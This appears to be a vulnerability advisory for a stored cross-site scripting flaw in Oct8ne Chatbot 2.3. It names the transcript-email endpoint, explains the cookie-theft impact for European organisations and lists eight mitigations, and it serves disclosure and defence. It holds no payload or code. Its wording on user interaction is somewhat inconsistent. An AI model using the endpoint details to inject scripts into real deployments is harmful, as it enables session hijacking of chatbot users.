CVE-2025-11952 is a stored Cross-site Scripting (XSS) vulnerability classified under CWE-79, affecting Oct8ne Chatbot version 2.3. The flaw arises due to improper neutralization of input during web page generation, specifically in the functionality that creates chat transcripts and sends them via email through the /Records/SendSummaryMail endpoint. An attacker can inject malicious JavaScript payloads into the transcript content, which are stored and later executed in the context of the victim's browser when the transcript email is viewed. This enables the attacker to steal sensitive information such as session cookies or perform actions on behalf of the user without their consent. The vulnerability is remotely exploitable over the network without requiring authentication, but it does require user interaction to open the malicious transcript email. The CVSS 4.0 score of 5.3 reflects medium severity, with attack vector being network-based, low attack complexity, no privileges or user interaction required for initial injection, but user interaction needed to trigger the payload. The scope is limited to the affected version 2.3 of Oct8ne Chatbot. No patches or fixes are currently linked, and no known exploits have been reported in the wild. The vulnerability was assigned and published by INCIBE on October 22, 2025.

For European organizations using Oct8ne Chatbot version 2.3, this vulnerability poses a significant risk to confidentiality and integrity of user data. Successful exploitation can lead to session hijacking, unauthorized actions performed with the victim's privileges, and potential data leakage. This can result in compromised user accounts, unauthorized access to sensitive business information, and reputational damage. Since the chatbot may be integrated into customer support or internal communication workflows, exploitation could disrupt business operations or lead to compliance violations under GDPR if personal data is exposed. The medium severity score indicates a moderate but tangible risk, especially in environments where users frequently interact with chatbot transcripts via email. The lack of authentication requirement for injection increases the attack surface, making it easier for external attackers to attempt exploitation. However, the need for user interaction to trigger the payload somewhat limits the immediacy of impact.

1. Immediately audit and restrict access to the /Records/SendSummaryMail endpoint to trusted users only, if possible. 2. Implement input validation and output encoding on all user-supplied data used in transcript generation to neutralize malicious scripts. 3. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. 4. Educate users to be cautious when opening chatbot transcript emails, especially those from unknown or unexpected sources. 5. Monitor email systems for suspicious transcript emails containing unusual scripts or payloads. 6. If patching is not yet available, consider disabling the transcript email functionality temporarily to prevent exploitation. 7. Work with Oct8ne vendor support to obtain or request a security patch addressing this vulnerability. 8. Conduct regular security assessments of chatbot integrations and email workflows to detect similar injection flaws.